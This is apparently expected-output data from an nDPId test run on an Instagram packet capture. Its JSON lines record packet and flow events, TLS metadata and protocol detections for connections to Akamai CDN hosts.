00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1436720908615,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908615,"pkt":"ABsv8H60QPMIw47hCABFAAA0nwZAAEAGbb\/AqABnUlUamqDdAbvgTnGEA9q1Z4AQAOUuJQAAAQEICgAD7opUeSUG"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1436720908616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908616,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGE75SVRqawKgAZwG7oN5hmBQZ4jr3HqASOJCH0wAAAgQFlgQCCApUeSUGAAPuhgEDAwU="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1436720908616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908616,"pkt":"ABsv8H60QPMIw47hCABFAAA0GZxAAEAG8ynAqABnUlUamqDeAbviOvceYZgUGoAQAOUuJQAAAQEICgAD7opUeSUG"}
00984{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908576,"flow_last_seen":1436720908617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1436720908617,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00984{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908577,"flow_last_seen":1436720908619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1436720908619,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908581,"flow_last_seen":1436720908633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1436720908633,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}}
01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":385,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908581,"flow_last_seen":1436720908634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4354,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1436720908634,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}}
01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908572,"flow_last_seen":1436720908636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1868,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1436720908636,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}}
01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":393,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908572,"flow_last_seen":1436720908638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1436720908638,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}}
01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908576,"flow_last_seen":1436720908660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1436720908660,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}}
01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":402,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908576,"flow_last_seen":1436720908661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1436720908661,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}}
01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908577,"flow_last_seen":1436720908663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1436720908663,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}}
01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908577,"flow_last_seen":1436720908665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1436720908665,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908581,"flow_last_seen":1436720908581,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908581,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1436720908581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908581,"pkt":"ABsv8H60QPMIw47hCABFAAA8pvhAAEAGXgvAqABnLiFGiO3sAbtrdUh\/AAAAAKACOQg15wAAAgQFtAQCCAoAA+6HAAAAAAEDAwY="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1436720908594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908594,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGC94uIUauwKgAZwG7rg7lq\/ivshtmvaASOJCK2QAAAgQFlgQCCAquiQq2AAPuhgEDAwU="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1436720908594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908594,"pkt":"ABsv8H60QPMIw47hCABFAAA0iDtAAEAGfKrAqABnLiFGrq4OAbuyG2a95av4sIAQAOU2BQAAAQEICgAD7oiuiQq2"}
00985{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908572,"flow_last_seen":1436720908596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1436720908596,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1436720908603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908603,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGDAQuIUaIwKgAZwG77ezRfJMua3VIgKASOJCHDAAAAgQFlgQCCArOjo1YAAPuhwEDAwU="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1436720908603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908603,"pkt":"ABsv8H60QPMIw47hCABFAAA0pvlAAEAGXhLAqABnLiFGiO3sAbtrdUiA0XyTL4AQAOU13wAAAQEICgAD7onOjo1Y"}
00984{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908581,"flow_last_seen":1436720908606,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1436720908606,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1436720908615,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908615,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGE75SVRqawKgAZwG7oN0D2rVm4E5xhKASOJDLywAAAgQFlgQCCApUeSUGAAPuhgEDAwU="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1436720908615,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908615,"pkt":"ABsv8H60QPMIw47hCABFAAA0nwZAAEAGbb\/AqABnUlUamqDdAbvgTnGEA9q1Z4AQAOUuJQAAAQEICgAD7opUeSUG"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1436720908616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908616,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGE75SVRqawKgAZwG7oN5hmBQZ4jr3HqASOJCH0wAAAgQFlgQCCApUeSUGAAPuhgEDAwU="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1436720908616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908616,"pkt":"ABsv8H60QPMIw47hCABFAAA0GZxAAEAG8ynAqABnUlUamqDeAbviOvceYZgUGoAQAOUuJQAAAQEICgAD7opUeSUG"}
00984{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908576,"flow_last_seen":1436720908617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1436720908617,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00984{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908577,"flow_last_seen":1436720908619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1436720908619,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908581,"flow_last_seen":1436720908633,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1436720908633,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}}
01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":385,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908581,"flow_last_seen":1436720908634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4354,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1436720908634,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}}
01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908572,"flow_last_seen":1436720908636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1868,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1436720908636,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}}
